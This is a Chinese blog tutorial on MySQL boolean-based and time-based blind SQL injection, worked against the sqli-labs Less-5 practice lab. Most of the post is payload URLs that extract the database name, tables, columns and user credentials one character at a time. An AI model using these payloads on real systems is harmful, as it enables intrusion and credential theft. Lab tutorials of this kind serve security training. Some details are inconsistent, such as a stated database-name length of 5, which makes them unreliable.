MYSQL布尔注入

最新推荐文章于 2024-07-25 16:06:56 发布
最新推荐文章于 2024-07-25 16:06:56 发布
阅读量422 收藏
点赞数
文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZccAc/article/details/108628566
版权

MYSQL布尔注入

原理为利用mid()获取字符,利用ord()将字符转为ASCII码,利用>、<和=来确定字符的范围。
获取数据库名长度
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or length(database())=8#

在这里插入图片描述

获取数据库名
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or ord(mid(database(),1,1))=115#
为 ‘s’
在这里插入图片描述

依次类推得到名字为’security’
查询表数量
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or (select count(*) from information_schema.tables where table_schema=database())=4#
在这里插入图片描述

表数量为4
获取第一个表名的长度
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6#
在这里插入图片描述

为6
获取第一个表的名字
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or ord(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101#
在这里插入图片描述

得到第一个字节为’e’
依次类推得到第一个表为’emails’
得到后几个表为
‘referers’,’users’,’ungents’

获取users字段的数据量
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and (select count(*) from users)=13#
可得共有13条数据
在这里插入图片描述

获取users字段数量及长度
数量
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or (select count(*) from information_schema.columns where table_name=‘users’ and table_schema=database()) =3#

在这里插入图片描述

表中字段为3
获取第一个字段名长度
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or length((select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit 0,1)) =2#
获取长度为2
在这里插入图片描述

获取第一个字段名首字母为’i’
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or ord(mid((select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit 0,1),1,1)) =105#
在这里插入图片描述

依次得到第一个表名为id
后面表为username,password。
获取username字段的第一条数据
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or length((select username from users limit 0,1)) =4#
长度为4
在这里插入图片描述

第一条数据第一个字母为’D’
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and ord(mid((select username from users limit 0,1),1,1)) =68#
在这里插入图片描述

依次得到第一个username为Dumb
第一个password字段数据长度为 4
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or length((select password from users limit 0,1)) =4#
在这里插入图片描述

第一条数据为与上面username对应为Dumb

后面可依次得到接下来的username和password

延时注入
通过sleep搭配if语句进行注入
适用于无回显状态
语句
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and sleep(if(length((select database()))>8,0,5))#
在大于8 的时候出现延时超过5秒现象,得到数据库名长度为5
在这里插入图片描述

接下去步骤如同布尔注入相同,只是用的函数不同

ZccAc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql盲注_Mysql 布尔型盲注手工注入详解
weixin_42524100的博客
01-18 547
0x00 什么叫布尔型盲注布尔布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值。一般也称为逻辑型。盲注在注入时页面无具体数据返回的注入称之为盲注,一般是通过其他表现形式来判断数据的具体内容布尔型盲注页面在执行sql语句后,只会显示两种结果,这时可通过构造逻辑表达式的sql语句来判断数据的具体内容。是不是听的云里雾里的,没关系,继续看0x01 Mysql...
mysql练习注入语句
01-21
这里,我们将学习 MySQL 的一些基本知识点,包括MySQL数据库函数、布尔盲注语句、时间盲注语句、宽字节注入、黑名单和白名单等。 一、MySQL数据库函数 MySQL提供了许多有用的函数,可以帮助我们更好地管理和操作...
Mysql注入 -- 布尔注入
weixin_41489908的博客
05-14 1458
千万不要在你还没辞职的时候,告诉你同事说要辞职了。。。 ---- 网易云热评 一、常用函数 1、mid(str,1,5):取字符串str的前5个字节 2、ord():转换成ASCII码 3、length():统计长度 4、 ascii():将字符转换ASCII 二、实例演示 1、and 1=1 访问http://192.168.139.129/sqli/Less-8/?id=1'and1=1--+返回正确 2、and 1=2 访问http://192.168...
MySQL布尔盲注
一个普普通通的博客
03-01 1479
Mysql注入布尔盲注
SQL注入MySQL注入
weixin_51583033的博客
12-20 838
SQL注入MySQL注入
Mysql注入读写文件
zsdddddss的博客
12-25 177
Mysql注入读写文件
Mysql 手工注入
weixin_45625450的博客
09-14 779
p=1&id=4’ and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=‘表名’ #x%’ and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9,…
mysql注入
resilient的博客
08-03 209
1.mysql中数字注入   2.mysql中字符串注入 #注释 ---sksal 也会当成注释来处理
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 2168
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users。现在这样子就知道了users这个表的所有字段名,假设知道了字段是:id,username,password。好了这样就知道所有的表名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
mysql 报错注入语句_mysql注入
weixin_42165583的博客
02-01 284
SQL的注入类型有以下5种:Boolean-based blind SQL injection(布尔注入)Error-based SQL injection(报错型注入)UNION query SQL injection(可联合查询注入)Stacked queries SQL injection(可多语句查询注入)Time-based blind SQL injection(基于时间延迟注入)u...
Mysql注入总结1
08-03
MySQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL语句来操纵数据库,获取敏感信息或执行非授权操作。以下是对标题“Mysql注入总结1”和描述中涉及的知识点的详细解释: 1. **UNION SELECT 注入**...
mysql后台注入.zip
04-28
MySQL后台注入是一种安全漏洞,它发生在Web应用程序中,允许攻击者通过输入特定的SQL语句来操纵或访问数据库。这种漏洞通常源于不安全的编程实践,例如没有正确地过滤、转义或验证用户输入的数据。当这些数据被直接...
JDBC对MySQL数据库布尔字段的操作方法
09-03
本篇文章将深入探讨如何使用JDBC来操作MySQL数据库中的布尔字段,特别是在处理BIT(1)类型的布尔字段时需要注意的细节。 首先,MySQL数据库中的布尔类型通常表示为BIT(1),这是因为MySQL并没有原生的BOOLEAN或BOOL...
sql注入讲解ppt.pptx
08-10
4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果...
MYSQL
maoqiwei的博客
07-23 277
1.修改student 表中年龄(sage)字段属性,数据类型由int 改变为smallint 2.为Course表中Cno 课程号字段设置索引,并查看索引 3.为SC表建立按学号(sno)和课程号(cno)组合的升序的主键索引,索引名为SC_INDEX4.创建一视图 stu info,查询全体学生的姓名,性别,课程名,成绩5.删除所有索引
MySQL DBA 修炼之道》第四章 开发进阶
最新发布
Trishia的博客
07-25 576
博主学习《MySQL DBA 修炼之道》结合自身理解的总结。主要讲解了范式、反范式、慢SQL查询、事务和锁等。
MySQL字段设置的varchar长度小于数据长度自动截取丢弃超出的长度而不是报错?
weixin_43831997的博客
07-23 381
MySQL数据库设置为==严格模式(STRICT_TRANS_TABLES 或 STRICT_ALL_TABLES)==时,如果尝试插入或更新超过设定长度的数据,将会导致错误,并阻止该事务进行。在默认情况下,或者在非严格模式(NO_STRICT)下,当插入长度超出 VARCHAR 字段定义的字符串时,MySQL会自动截断超出的部分,并发出一个警告,而不是错误。
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 793
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
MySQL布尔型高级盲注实战与技巧解析
总结来说,MySQL布尔型盲注是一种技术性较强的注入攻击手段,它利用服务器对布尔表达式结果的响应来推测SQL语句的执行情况,攻击者需要灵活运用条件构造和工具辅助,以确保信息的获取和攻击的有效性。在安全防御中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值